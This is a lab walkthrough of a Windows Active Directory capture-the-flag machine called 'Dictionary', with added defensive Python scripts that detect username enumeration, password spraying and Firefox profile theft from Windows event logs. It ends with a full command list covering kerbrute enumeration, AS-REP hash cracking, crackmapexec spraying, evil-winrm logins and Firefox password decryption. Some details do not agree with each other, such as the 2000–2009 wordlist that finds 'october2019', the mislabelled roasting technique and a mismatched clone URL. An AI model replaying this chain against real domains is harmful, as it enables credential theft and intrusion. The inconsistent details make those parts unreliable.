Premise
In this video walkthrough, we went over a Windows Active Directory lab where we demonstrated the enumeration and privilege escalation through a complete method of password enumeration and extraction. We performed privilege escalation by decrypting a Firefox profile to extract passwords.
Machine Name: Dictionary
Difficulty: Medium
Skills Learned
- Kerbruting
- Kerberoasting
- Password Spraying
- Firefox passwords retrieval
Finding the First Foothold
My first step was to find a valid user on the system. I started by using tools like nmap and kerbrute to see what user accounts I could find. Initially, I only found one user: “isabel”.
With a username in hand, I tried a technique called Kerberoasting. I used a script called getnpusers.py to request a special kind of Kerberos ticket for “isabel”. I was in luck! I got a hash that I could try to crack offline.
I then used the password cracking tool john with a common wordlist to crack the hash. It didn’t take long to find the password: “june2013”.
However, when I tried to log in as “isabel” with this password, it didn’t work. This meant I had to dig a little deeper.
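The username guessing and the ticket request described above both leave a trace on the domain controller in Security event 4768 (a TGT was requested). The following script is an added example, not part of the original walkthrough: it runs two detections over a handful of constructed 4768 events flattened to key=value lines (the format is assumed; the field names are the real 4768 ones). A burst of result code 0x6 (client principal unknown) from one source is the footprint of name enumeration, and a successful TGT with pre-authentication type 0 identifies an account that can be roasted offline.

```python
import re
from collections import defaultdict

# Constructed sample of Windows Security event 4768, one key=value line per event.
# Field names follow the real 4768 schema; hosts, names and times are made up.
SAMPLE_4768 = """\
ts=2024-05-01T10:00:01 EventID=4768 TargetUserName=aaron IpAddress=::ffff:10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
ts=2024-05-01T10:00:01 EventID=4768 TargetUserName=abby IpAddress=::ffff:10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
ts=2024-05-01T10:00:02 EventID=4768 TargetUserName=adam IpAddress=::ffff:10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
ts=2024-05-01T10:00:02 EventID=4768 TargetUserName=alex IpAddress=::ffff:10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
ts=2024-05-01T10:00:03 EventID=4768 TargetUserName=amy IpAddress=::ffff:10.10.14.5 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
ts=2024-05-01T10:00:03 EventID=4768 TargetUserName=isabel IpAddress=::ffff:10.10.14.5 Status=0x0 PreAuthType=0 TicketEncryptionType=0x17
ts=2024-05-01T10:00:04 EventID=4768 TargetUserName=backupisabel IpAddress=::ffff:10.10.14.5 Status=0x19 PreAuthType=- TicketEncryptionType=0xffffffff
ts=2024-05-01T10:05:00 EventID=4768 TargetUserName=svc_backup IpAddress=::ffff:172.31.3.20 Status=0x0 PreAuthType=2 TicketEncryptionType=0x12
ts=2024-05-01T10:06:00 EventID=4768 TargetUserName=jsmith IpAddress=::ffff:172.31.3.21 Status=0x6 PreAuthType=- TicketEncryptionType=0xffffffff
"""

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_events(text):
    """Turn the flattened key=value lines into a list of dicts, one per event."""
    return [dict(KV_RE.findall(line)) for line in text.splitlines() if line.strip()]


def enumeration_sources(events, min_unknown_users=5):
    """Return {source_ip: sorted unknown usernames} for every source that asked the
    KDC for TGTs of at least min_unknown_users names it does not know.
    Status 0x6 is KDC_ERR_C_PRINCIPAL_UNKNOWN; a burst of them from one client is
    what username guessing such as kerbrute userenum looks like on the DC."""
    unknown = defaultdict(set)
    for ev in events:
        if ev.get("EventID") == "4768" and ev.get("Status") == "0x6":
            unknown[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: sorted(u) for ip, u in unknown.items() if len(u) >= min_unknown_users}


def asrep_roastable_tgts(events):
    """Return [(user, source_ip, enc_type)] for TGTs issued without pre-authentication.
    PreAuthType 0 on a successful 4768 means the account has "Do not require
    Kerberos preauthentication" set, so anyone can obtain its encrypted AS-REP and
    attack it offline; encryption type 0x17 (RC4-HMAC) makes that cheap."""
    return [
        (ev["TargetUserName"], ev["IpAddress"], ev["TicketEncryptionType"])
        for ev in events
        if ev.get("EventID") == "4768" and ev.get("Status") == "0x0" and ev.get("PreAuthType") == "0"
    ]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_4768)
    for ip, users in enumeration_sources(evs).items():
        print(f"[enum]  {ip} probed {len(users)} unknown names: {', '.join(users)}")
    for user, ip, enc in asrep_roastable_tgts(evs):
        print(f"[asrep] {user} received a TGT without pre-auth from {ip} (etype {enc})")
```

The remediation for the second finding is on the account itself: clear the “Do not require Kerberos preauthentication” flag, or at least make sure the account has a long random password and AES-only encryption types, since the hash in the AS-REP is only as strong as the password behind it.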
Expanding My Attack Surface
I went back to enumerating users, but this time I used a tool called rpcclient. This gave me a lot more information, and I was able to find several other users, including “backupisabel”.
Now, here’s where I had a bit of an “aha!” moment. The machine was named “Dictionary,” and the password I found was “june2013”. I had a hunch that other passwords might follow the same “monthyear” pattern.
To test this theory, I created a custom wordlist of passwords that followed this pattern, from January 2000 all the way to December 2009. Then, I used a tool called crackmapexec to try all of these passwords against the list of users I had found.
It worked! I found that the user “backupisabel” had the password “october2019“. With these new credentials, I was able to log in to the machine.
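From the defender’s side, the spray described above has two weak points: every guess against SMB is logged on the target as Security event 4625, and the month-plus-year pattern that made the spray work is trivial to reject in a password filter. The script below is an added example, not part of the original walkthrough. It assumes constructed 4625 events flattened to key=value lines (real field names, made-up values) and shows why a per-source count of distinct accounts catches a spray that per-account lockout never sees, plus the pattern check an audit should apply.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security event 4625 ("An account failed to log on")
# on a host sprayed over SMB (LogonType 3 = network). SubStatus 0xC000006A is
# "wrong password". Times, names and addresses are made up.
SAMPLE_4625 = """\
ts=2024-05-01T11:00:00 EventID=4625 TargetUserName=isabel LogonType=3 IpAddress=10.10.14.5 Status=0xC000006D SubStatus=0xC000006A
ts=2024-05-01T11:00:00 EventID=4625 TargetUserName=backupisabel LogonType=3 IpAddress=10.10.14.5 Status=0xC000006D SubStatus=0xC000006A
ts=2024-05-01T11:00:01 EventID=4625 TargetUserName=jsmith LogonType=3 IpAddress=10.10.14.5 Status=0xC000006D SubStatus=0xC000006A
ts=2024-05-01T11:00:01 EventID=4625 TargetUserName=mjones LogonType=3 IpAddress=10.10.14.5 Status=0xC000006D SubStatus=0xC000006A
ts=2024-05-01T11:00:02 EventID=4625 TargetUserName=svc_backup LogonType=3 IpAddress=10.10.14.5 Status=0xC000006D SubStatus=0xC000006A
ts=2024-05-01T11:00:02 EventID=4625 TargetUserName=administrator LogonType=3 IpAddress=10.10.14.5 Status=0xC000006D SubStatus=0xC000006A
ts=2024-05-01T11:30:00 EventID=4625 TargetUserName=jsmith LogonType=2 IpAddress=172.31.3.30 Status=0xC000006D SubStatus=0xC000006A
ts=2024-05-01T11:31:00 EventID=4625 TargetUserName=jsmith LogonType=2 IpAddress=172.31.3.30 Status=0xC000006D SubStatus=0xC000006A
ts=2024-05-01T11:32:00 EventID=4625 TargetUserName=jsmith LogonType=2 IpAddress=172.31.3.30 Status=0xC000006D SubStatus=0xC000006A
"""

KV_RE = re.compile(r"(\w+)=(\S+)")
MONTH_YEAR_RE = re.compile(
    r"^(january|february|march|april|may|june|july|august|september|october|november|december)"
    r"(19|20)\d{2}$",
    re.IGNORECASE,
)


def parse_events(text):
    """Turn the flattened key=value lines into a list of dicts, one per event."""
    return [dict(KV_RE.findall(line)) for line in text.splitlines() if line.strip()]


def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Return {source_ip: sorted usernames} for sources whose failed logons touched
    at least min_users distinct accounts inside one `window`. A spray is the
    inverse of a brute force: one or two guesses per account across many accounts,
    so per-account lockout counters never trip, but the per-source count of
    distinct users does. One user failing repeatedly (a typo, a stale service
    credential) is deliberately not reported here."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev.get("EventID") == "4625":
            by_ip[ev["IpAddress"]].append((datetime.fromisoformat(ev["ts"]), ev["TargetUserName"]))
    flagged = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        best, start = set(), 0
        for end in range(len(attempts)):          # sliding window over time-ordered attempts
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            users = {u for _, u in attempts[start:end + 1]}
            if len(users) > len(best):
                best = users
        if len(best) >= min_users:
            flagged[ip] = sorted(best)
    return flagged


def is_month_year_password(candidate):
    """True when a password is just a month name followed by a four-digit year,
    the pattern a password filter or offline audit should reject outright."""
    return MONTH_YEAR_RE.match(candidate) is not None


if __name__ == "__main__":
    for ip, users in detect_spray(parse_events(SAMPLE_4625)).items():
        print(f"[spray] {ip} failed logons for {len(users)} accounts: {', '.join(users)}")
    for pw in ("june2013", "October2019", "P@$$w0rd"):
        print(f"{pw!r}: {'weak pattern' if is_month_year_password(pw) else 'ok'}")
```

Run on the constructed sample it reports the one source that hit six accounts in two seconds and stays quiet about the workstation that failed three times for a single user. In a real estate the same distinct-user count per source is what a SIEM rule for password spraying keys on, and a fine-grained password policy or filter that rejects month-year strings removes the pattern the spray relied on.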
From User to Administrator
Now that I was in, I needed to find a way to become the administrator. I ran a script called winpeas.exe, which scans the system for potential ways to escalate privileges.
winpeas pointed me to a very interesting find: a Firefox password database. I navigated to the Firefox profile directory on the remote machine and downloaded the necessary files: key4.db, logins.json, search.json.mozlz4, and cookies.sqlite.
Back on my own machine, I used a Python tool called firefox_decrypt to extract the passwords from these files. This gave me a list of saved passwords, and one of them looked like it might be for the administrator account.
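The profile copy above works because key4.db (the NSS key store) and logins.json (the encrypted entries) are both readable by the logged-in user, and once both are off the box the decryption happens at the attacker's leisure. The only place a defender can see it is the read of those files by something other than Firefox. The script below is an added example, not part of the original walkthrough or of firefox_decrypt: it assumes a read SACL on the profile directory so that Windows emits Security event 4663 for each open, and parses constructed, pipe-delimited 4663 records (real field names, made-up paths, users and processes). It flags profile secrets opened by an unexpected process and raises the confidence when one process reads key4.db and logins.json together, which is the pair needed for decryption.

```python
from pathlib import PureWindowsPath

# Profile files that together expose saved logins and sessions.
PROFILE_SECRETS = {"key4.db", "logins.json", "cert9.db", "cookies.sqlite", "search.json.mozlz4"}
# The pair that is sufficient to recover saved passwords offline.
DECRYPTION_PAIR = {"key4.db", "logins.json"}
# Processes expected to open these files; anything else is worth a look.
EXPECTED_PROCESSES = {"firefox.exe"}

# Constructed sample of Security event 4663 ("An attempt was made to access an
# object"), flattened to ts|EventID|SubjectUserName|ProcessName|ObjectName|AccessMask.
# AccessMask 0x1 is ReadData. wsmprovhost.exe is the host process for PowerShell
# remoting sessions, which is how a remote-shell file download reads the file.
SAMPLE_4663 = r"""
2024-05-01T12:00:00|4663|backupisabel|C:\Program Files\Mozilla Firefox\firefox.exe|C:\Users\backupisabel\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default-release\key4.db|0x1
2024-05-01T12:14:10|4663|backupisabel|C:\Windows\System32\wsmprovhost.exe|C:\Users\backupisabel\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default-release\key4.db|0x1
2024-05-01T12:14:12|4663|backupisabel|C:\Windows\System32\wsmprovhost.exe|C:\Users\backupisabel\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default-release\logins.json|0x1
2024-05-01T12:14:15|4663|backupisabel|C:\Windows\System32\wsmprovhost.exe|C:\Users\backupisabel\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default-release\cert9.db|0x1
2024-05-01T12:14:18|4663|backupisabel|C:\Windows\System32\wsmprovhost.exe|C:\Users\backupisabel\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default-release\cookies.sqlite|0x1
2024-05-01T12:20:00|4663|jsmith|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Users\jsmith\AppData\Roaming\Mozilla\Firefox\Profiles\zzzz9999.default-release\places.sqlite|0x1
"""


def flag_profile_reads(text, expected=EXPECTED_PROCESSES):
    """Return [(ts, user, process, file)] for every audited read of a profile secret
    by a process that is not expected to touch it."""
    hits = []
    for line in text.strip().splitlines():
        ts, event_id, user, process, obj, _mask = line.split("|")
        if event_id != "4663":
            continue
        proc = PureWindowsPath(process).name.lower()
        fname = PureWindowsPath(obj).name.lower()
        if fname in PROFILE_SECRETS and proc not in expected:
            hits.append((ts, user, proc, fname))
    return hits


def group_by_actor(hits):
    """Collapse hits to {(user, process): set(files)} so one profile copy shows as
    one finding rather than four separate alerts."""
    grouped = {}
    for _ts, user, proc, fname in hits:
        grouped.setdefault((user, proc), set()).add(fname)
    return grouped


def likely_credential_theft(grouped):
    """Actors that read both halves needed for offline decryption."""
    return [actor for actor, files in grouped.items() if DECRYPTION_PAIR <= files]


if __name__ == "__main__":
    grouped = group_by_actor(flag_profile_reads(SAMPLE_4663))
    for (user, proc), files in grouped.items():
        print(f"[profile-read] {user} via {proc}: {', '.join(sorted(files))}")
    for user, proc in likely_credential_theft(grouped):
        print(f"[HIGH] {user} via {proc} read key4.db and logins.json together")
```

The read by firefox.exe and the unrelated places.sqlite open are left alone; the remoting host reading all four files in eight seconds is reported once, at high confidence. The control that removes the finding entirely is a primary (master) password on the profile, which makes key4.db useless without it.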
I used crackmapexec again to test these new passwords against the “administrator” account, and I found the correct one. With the administrator’s password in hand, I was able to log in and complete the challenge.
Technical Commands Used
Here’s a list of the commands I used to compromise this machine:
- User Enumeration:
sudo nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=dictionary.htb,userdb=/usr/share/wordlists/seclists/Usernames/names.txt 172.31.3.4
./kerbrute userenum --dc 172.31.3.4 /usr/share/wordlists/seclists/Usernames/names.txt
sudo nmap -sV --script ldap-search 172.31.3.4
sudo rpcclient 172.31.3.4 -U isabel%getmein
querydominfo
- Password Cracking and Authentication:
getnpusers.py -usersfile users.txt dictionary.htb
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
crackmapexec smb 172.31.3.4 -u users.txt -p pass.txt
- Privilege Escalation and Data Exfiltration:
sudo evil-winrm -i 172.31.3.4 -u backupisabel -p 'October2019'
sudo evil-winrm -i 172.31.3.4 -u administrator -p 'P@$$w0rd'
whoami /priv
whoami /all
cd Documents
cd AppData
cd Roaming
cd Mozilla
cd Firefox
cd Profiles
dir
download key4.db
download logins.json
download cert9.db
download cookies.sqlite
sudo mv key4.db cert9.db cookies.sqlite logins.json firefox_ps
cd firefox_ps
git clone https://github.com/lclevy/firefoxy.git
cd firefox-decrypt
sudo python3 firefox_decrypt.py -p /home/kali/firefox_ps